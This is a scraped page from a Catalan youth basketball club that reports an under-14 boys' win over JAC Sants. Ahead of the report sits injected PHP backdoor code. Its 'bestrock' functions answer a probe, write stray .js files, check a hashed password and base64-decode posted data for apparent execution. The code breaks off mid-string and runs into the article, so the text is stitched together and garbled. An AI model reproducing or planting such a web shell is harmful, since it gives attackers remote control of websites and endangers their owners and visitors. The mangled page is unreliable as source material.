function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí 06 A aprofita l'empenta de la primera meitat i derrota el JAC Sants (65-61) - Tgn Bàsquet Club -

L’infantil masculí 06 A aprofita l’empenta de la primera meitat i derrota el JAC Sants (65-61)

Updated: desembre 17, 2019

L’equip infantil masculí 06 A va derrotar el JAC Sants en un partit amb dues meitats diferents. El conjunt lila va sortir amb molta empenta, molt actiu en defensa i recuperant moltes pilotes, un fet que li permetia anotar en contraatac. La dinàmica es va mantenir en el segon període i el marcador al descans mostrava un clar 34-18 que no seria, però definitiu. Els visitants van reaccionar a la represa i van aprofitar la davallada en la concentració local que va veure com el seu rival se li acostava perillosament (45-40 al final del tercer quart). Només la sang freda a l’hora de buscar faltes i anotar tirs lliures va permetre els locals mantenir un avantatge mínim i sumar un altre triomf.